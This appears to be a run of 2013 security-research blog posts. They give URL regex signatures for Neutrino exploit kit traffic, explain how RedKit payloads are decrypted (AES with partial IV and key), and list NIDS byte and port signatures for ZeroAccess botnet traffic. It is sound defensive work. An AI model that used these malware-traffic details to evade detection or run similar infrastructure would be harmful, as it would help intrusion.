00000c0: c3bc 0801 c3bf c3bc 20c3 87c2 85c3 bc06  ........ .......
00000d0: 01c3 bfc3 bc20 c387 c292 c3bc 1101 c3bf  ..... ..........

Oh yeah thats an exe file.


Virustotal for the exe: 2/46

Virustotal for the JAR: 2/45

8. Network detection


Lets have a look at @malwaresigs and see if we got the same. Looks like the old signature description is still valid. The HTTP POST request has changed as the "hid" aka host id variable now is incorporated in the URL Encoded part.

Looks like we can be more specific on:

*Change in patterns - spotted by @Set_Abominae 2013-05-15 - URLQuery

JARs: /(c|e)[a-z0-9]{1,11}\?(m|h)[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$

EXEs: /(d|p)[a-z0-9]{1,16}\?(m|h)[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$

landing: /(a|l)[a-z0-9]{1,16}\?(f|q)[a-z0-9]{1,12}=[0-9]{7}$

*Lets see if the change in URL patterns will continue. If so revert to signatures over @malwaresigs.


Update 2013-05-15
I have observed more patterns matching what @Set_Abominae reported yesterday.

Update 2013-07-29
The url patterns keep changing: Thanks to @urlquey and @node5 for providing samples!
JARs:/m[a-z0-9]{1,11}\?l[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{0,9})$
EXEs: /j[a-z0-9]{1,16}\?l[a-z0-9]{1,12}=([a-f0-9]{24}|[a-z]{7})$
landing: /s[a-z0-9]{1,16}\?d[a-z0-9]{1,12}=[0-9]{7}$

Happy analyzing and detecting Neutrino Exploit Kit activity :)

Neutrino references:
@kafein over at malware.dontneedcoffee.com has good stuff on Neutrino too.

Post publish reading:
blog.unmaskparasites.com - "Rotating iframe urls - one a minute"
malwaremustdie - "Knockin' on Neutrino Exploit Kit's door.."


Thursday, May 9, 2013

RedKit payload decryption

I have got a few questions regarding decrypting RedKit payloads after I posted the RedKit analysis.

As it was not part of the analysis I thought it was no need to publish it, and I had not seen it published elsewhere. A couple of days ago I saw that the details was published over at malwageddon.blogspot.com and now it is added here.

Decypting RedKit payload files

For the sample I looked into in my previous blog the keys where in the class Mancir. This will change, so be prepared to look for the information needed, Luckily it seem RK is not changing keys that often :)




OK so we got the information needed. AES with no padding, IV bcd2... and KEY 8a61...

All we need to do now is to grab our fvourite decryption tool(openssl?) and decrypt our file.


PS: the IV and Key has changed according to the malwageddon post so verify that you got the right ones.




Happy decrypting RedKit Exploit Kit encrypted files :)


Wednesday, May 1, 2013

ZeroAccess Network detection


If you are into NIDS you probably want to look into detecting ZeroAccess traffic on your network. It is still spreading and infecting computers through exploit kits. F-Secure said it was the most profitable and fastest growing botnet of 2012. In addition, not all NIDS vendors have signatures to detect this by default configuration.

For analysis of the network traffic look at my post «ZeroAccess analysis part I – Network traffic». I have also made a python script to check if a remote host is infected – infomation about that can be found in the post «Checking ZeroAccess with Python and Scapy»

ZeroAccess is not the worst thing to get on your network, but you never know when that is going to change or what other bad stuff is on your vulnerable hosts. And, of course, we do not want these guys to earn money on our watch.

1. Detect the installation


Detecting the installation phase of the bot is nice as we can then also look into the infection mechanism and aslo see what the host was vulnerable to and fix it.
During the installation the bot talks to a set of hardcoded addresses on UDP port 123 and UDP port 53. (camouflaging as NTP and DNS). The port 53 traffic is distinctive as the UDP payload byte 8-9 are the country code after a geoIP lookup to maxmind. This is NSCount if it was DNS traffic, so by looking up country codes here we should have little chance for False Positives. One problem though the UDP payload is XORED so we need to find the corect country code.

Luckily I have made a script to generate the correct hex values:





So all we have to do then is create a signature that detects UDP port 53 traffic that has byte 8-9 set to our local country code. That should not hit performance to bad either. Alert for ZeroaAccess installation detected.


The UDP 123 traffic can be detected pretty much tha same way. UDP payload byte 0-1 will be 0x474e and the followeb by country code again. Once again XORED so we need to generate our country code:




Alert for ZeroAccess bot installation complete with UDP port 123 and the bytes given above that is correct for your environment.

That should reliably detect ZeroAccess installations.

2. Detect P2P update traffic



When the bot is up and running and want to keep its P2P list up to date it talks to ZeroAccess supernodes on UDP port 16464, 16465, 16470 or 16471. As we remember from the analysis it will be asking for P2P lists with the command getL. This is XORED with a different key but the values are static so we can simply just look for them in the packet.

Lets add that to the ports and we should be hitting bullseye with this signature as well. UDP payload byte 4-7 should look like 0x28948dab. Alert on ZeroAccess P2P activity.


That should take care of the installation part and update parts of the ZeroAccess bot.



Happy ZeroAccess detection